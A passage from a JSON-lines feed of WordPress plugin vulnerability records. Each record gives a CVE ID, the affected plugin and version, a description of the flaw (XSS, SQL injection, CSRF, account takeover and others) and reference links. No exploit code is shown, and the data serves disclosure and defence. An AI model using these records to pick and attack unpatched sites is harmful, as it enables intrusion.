RCE.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog-designer-pack\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog-designer-pack\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2984052%40blog-designer-pack&new=2984052%40blog-designer-pack&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2984052%40blog-designer-pack&new=2984052%40blog-designer-pack&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.leavesongs.com\\\/PENETRATION\\\/docker-php-include-getshell.html#0x06-pearcmdphp\",\"name\":\"https:\\\/\\\/www.leavesongs.com\\\/PENETRATION\\\/docker-php-include-getshell.html#0x06-pearcmdphp\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0506","slug":"elementor","versionImpact":"3.18.3","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $instance[alt] parameter in the get_image_alt function in all versions up to, and including, 3.18.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.18.3\\\/includes\\\/controls\\\/groups\\\/image-size.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.18.3\\\/includes\\\/controls\\\/groups\\\/image-size.php#L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.18.3\\\/includes\\\/controls\\\/media.php#L381\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.18.3\\\/includes\\\/controls\\\/media.php#L381\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024999\\\/elementor\\\/trunk\\\/includes\\\/controls\\\/groups\\\/image-size.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024999\\\/elementor\\\/trunk\\\/includes\\\/controls\\\/groups\\\/image-size.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2304","slug":"animated-headline","versionImpact":"4.0","description":"The Animated Headline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animated-headline' shortcode in all versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f589b5d-9cdb-4521-bc60-c8f19d0ef982?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f589b5d-9cdb-4521-bc60-c8f19d0ef982?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animated-headline\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animated-headline\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5570","slug":"simple-photoswipe","versionImpact":"0.1","description":"The Simple Photoswipe WordPress plugin through 0.1 does not have authorisation check when updating its settings, which could allow any authenticated users, such as subscriber to update them","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49b3a8cb-f606-4cf7-80ec-bfdafd74e848\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49b3a8cb-f606-4cf7-80ec-bfdafd74e848\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2337","slug":"easy-testimonials","versionImpact":"3.9.5","description":"The Easy Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'testimonials_grid ' shortcode in all versions up to, and including, 3.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c470cb0-5cbc-4ae1-b75a-384668d07215?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c470cb0-5cbc-4ae1-b75a-384668d07215?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-testimonials\\\/trunk\\\/easy-testimonials.php#L1039\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-testimonials\\\/trunk\\\/easy-testimonials.php#L1039\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9457","slug":"cssjockey-add-ons","versionImpact":"3.0.7","description":"The WP Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/041c21fb-f2f0-45cb-b3ae-20f3ae22c947?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/041c21fb-f2f0-45cb-b3ae-20f3ae22c947?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cssjockey-add-ons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cssjockey-add-ons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47429","slug":"8-degree-coming-soon-page","versionImpact":"2.2.0","description":"Missing Authorization vulnerability in 8Degree Themes Coming Soon Landing Page and Maintenance Mode WordPress Plugin allows Retrieve Embedded Sensitive Data.This issue affects Coming Soon Landing Page and Maintenance Mode WordPress Plugin: from n\/a through 2.2.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/8-degree-coming-soon-page\\\/vulnerability\\\/wordpress-coming-soon-landing-page-and-maintenance-mode-wordpress-plugin-plugin-2-2-0-broken-access-control?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/8-degree-coming-soon-page\\\/vulnerability\\\/wordpress-coming-soon-landing-page-and-maintenance-mode-wordpress-plugin-plugin-2-2-0-broken-access-control?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12592","slug":"sellsy","versionImpact":"2.3.3","description":"The Sellsy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'testSellsy' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sellsy\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sellsy\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fd3610c-cce4-420c-85c1-0b71679df650?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fd3610c-cce4-420c-85c1-0b71679df650?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11132","slug":"eventer","versionImpact":"3.9.9.4","description":"The Eventer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b747d61-4528-485e-b746-6dddc64485b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b747d61-4528-485e-b746-6dddc64485b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12339","slug":"wedesin-html-sitemap","versionImpact":"3.1.1","description":"The Digihood HTML Sitemap plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018channel\u2019 parameter in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedesin-html-sitemap\\\/trunk\\\/plugin-framework\\\/Functions\\\/Logging\\\/html.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedesin-html-sitemap\\\/trunk\\\/plugin-framework\\\/Functions\\\/Logging\\\/html.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedesin-html-sitemap\\\/trunk\\\/plugin-framework\\\/Functions\\\/Logging\\\/html.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedesin-html-sitemap\\\/trunk\\\/plugin-framework\\\/Functions\\\/Logging\\\/html.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/862f8743-5c8c-45ee-a2eb-9ae12c2800ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/862f8743-5c8c-45ee-a2eb-9ae12c2800ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3607","slug":"frontend-login-and-registration-blocks","versionImpact":"1.0.7","description":"The Frontend Login and Registration Blocks plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.7. This is due to the plugin not properly validating a user's identity prior to updating a password. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-login-and-registration-blocks\\\/trunk\\\/inc\\\/class-flr-blocks-lost-password.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-login-and-registration-blocks\\\/trunk\\\/inc\\\/class-flr-blocks-lost-password.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b06ce1e4-5cfb-415d-ad09-db194d6b4354?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b06ce1e4-5cfb-415d-ad09-db194d6b4354?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4205","slug":"popup-maker","versionImpact":"1.20.4","description":"The Popup Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018popupID\u2019 parameter in all versions up to, and including, 1.20.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-maker\\\/tags\\\/1.20.4\\\/assets\\\/js\\\/site.js#L869\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-maker\\\/tags\\\/1.20.4\\\/assets\\\/js\\\/site.js#L869\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303770\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303770\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/popup-maker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/popup-maker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58fe6f67-1139-4d3e-864d-3966cede5077?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58fe6f67-1139-4d3e-864d-3966cede5077?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7036","slug":"cleverreach-wp","versionImpact":"1.5.20","description":"The CleverReach\u00ae WP plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018title\u2019 parameter in all versions up to, and including, 1.5.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleverreach-wp\\\/tags\\\/1.5.20\\\/Controllers\\\/class-clever-reach-article-search-controller.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleverreach-wp\\\/tags\\\/1.5.20\\\/Controllers\\\/class-clever-reach-article-search-controller.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cleverreach-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cleverreach-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/764041ca-65cd-498c-97e5-a33d7b54a2b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/764041ca-65cd-498c-97e5-a33d7b54a2b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4458","slug":"amr-shortcode-any-widget","versionImpact":"4.0","description":"The amr shortcode any widget WordPress plugin through 4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c85ceab3-7e79-402d-ad48-a028f1ee070c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c85ceab3-7e79-402d-ad48-a028f1ee070c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1926","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the deleteCacheToolbar function. This makes it possible for unauthenticated attackers to perform cache deletion via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b793a4cb-3130-428e-9b61-8ce29fcdaf70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b793a4cb-3130-428e-9b61-8ce29fcdaf70?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3371","slug":"embedpress","versionImpact":"3.7.3","description":"The User Registration plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'lock_content_form_handler' and 'display_password_form' function in versions up to, and including, 3.7.3. This makes it possible for unauthenticated attackers to decrypt and view the password protected content.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/EmbedPress\\\/Includes\\\/Classes\\\/Helper.php#L231\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/EmbedPress\\\/Includes\\\/Classes\\\/Helper.php#L231\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1033b4d-82a0-4484-aebf-f35d6a2a9a13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1033b4d-82a0-4484-aebf-f35d6a2a9a13?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930523\\\/embedpress#file28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930523\\\/embedpress#file28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930523\\\/embedpress#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930523\\\/embedpress#file10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/EmbedPress\\\/Includes\\\/Classes\\\/Helper.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/EmbedPress\\\/Includes\\\/Classes\\\/Helper.php#L278\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/Gutenberg\\\/block-backend\\\/block-embedpress.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.7.3\\\/Gutenberg\\\/block-backend\\\/block-embedpress.php#L30\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5742","slug":"easyrotator-for-wordpress","versionImpact":"1.0.14","description":"The EasyRotator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easyrotator' shortcode in all versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3041e28e-d965-4672-ab10-8b1f3d874f19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3041e28e-d965-4672-ab10-8b1f3d874f19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easyrotator-for-wordpress\\\/tags\\\/1.0.14\\\/easyrotator.php#L1913\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easyrotator-for-wordpress\\\/tags\\\/1.0.14\\\/easyrotator.php#L1913\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0442","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via element URL parameters in all versions up to, and including, 1.3.87 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/256b4818-290b-4660-8e83-c18b068a8959?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/256b4818-290b-4660-8e83-c18b068a8959?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/royal-elementor-addons\\\/tags\\\/1.3.87&new_path=\\\/royal-elementor-addons\\\/tags\\\/1.3.88&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/royal-elementor-addons\\\/tags\\\/1.3.87&new_path=\\\/royal-elementor-addons\\\/tags\\\/1.3.88&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/pricing-table\\\/widgets\\\/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/pricing-table\\\/widgets\\\/pricing-table.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fpricing-table%2Fwidgets%2Fpricing-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/dual-button\\\/widgets\\\/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/dual-button\\\/widgets\\\/wpr-dual-button.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fdual-button%2Fwidgets%2Fwpr-dual-button.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/advanced-slider\\\/widgets\\\/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032004\\\/royal-elementor-addons\\\/tags\\\/1.3.88\\\/modules\\\/advanced-slider\\\/widgets\\\/wpr-advanced-slider.php?old=3026824&old_path=royal-elementor-addons%2Ftags%2F1.3.87%2Fmodules%2Fadvanced-slider%2Fwidgets%2Fwpr-advanced-slider.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2129","slug":"wpbits-addons-for-elementor","versionImpact":"1.3.4.2","description":"The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's heading widget in all versions up to, and including, 1.3.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05cd8f96-533a-4036-a01f-6ba1ad2d2b5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05cd8f96-533a-4036-a01f-6ba1ad2d2b5e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbits-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbits-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7264","slug":"build-app-online","versionImpact":"1.0.21","description":"The Build App Online plugin for WordPress is vulnerable to account takeover due to a weak password reset mechanism in all versions up to, and including, 1.0.21. This makes it possible for unauthenticated attackers to reset the password of arbitrary users by guessing a 4-digit numeric reset code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6047ae6-b1b4-4b31-aa12-560927e1040b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6047ae6-b1b4-4b31-aa12-560927e1040b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L3688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L3688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L3757\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L3757\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6575","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.2","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018res_width_value\u2019 parameter within the plugin's tp_page_scroll widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 